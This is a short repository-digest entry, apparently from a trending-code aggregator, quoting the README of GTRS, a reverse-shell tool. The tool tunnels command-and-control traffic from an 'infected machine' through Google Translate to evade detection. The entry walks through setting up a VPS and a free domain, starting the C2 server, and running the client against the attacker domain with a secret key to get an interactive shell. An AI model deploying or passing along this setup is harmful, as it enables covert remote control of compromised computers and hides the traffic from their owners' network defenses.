mthbernardes / GTRS
- вторник, 4 декабря 2018 г. в 00:16:27
Shell
GTRS - Google Translator Reverse Shell
This tools uses Google Translator as a proxy to send arbitrary commands to an infected machine.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
First you need a VPS and a domain, for the domain you can get a free one on Freenom.
Start the server.py on your VPS
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
It will provide you secret key which will be used on the client.sh, run the client on a computer with access to Google Translator, providing domain and the secret key generated by the server.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Now you have an interactive shell using named pipe files, YES you can cd
into directories.
.bashrc
.Problem fixed using User-Agent header to sent data
.xmllint
which is on libxml2-utils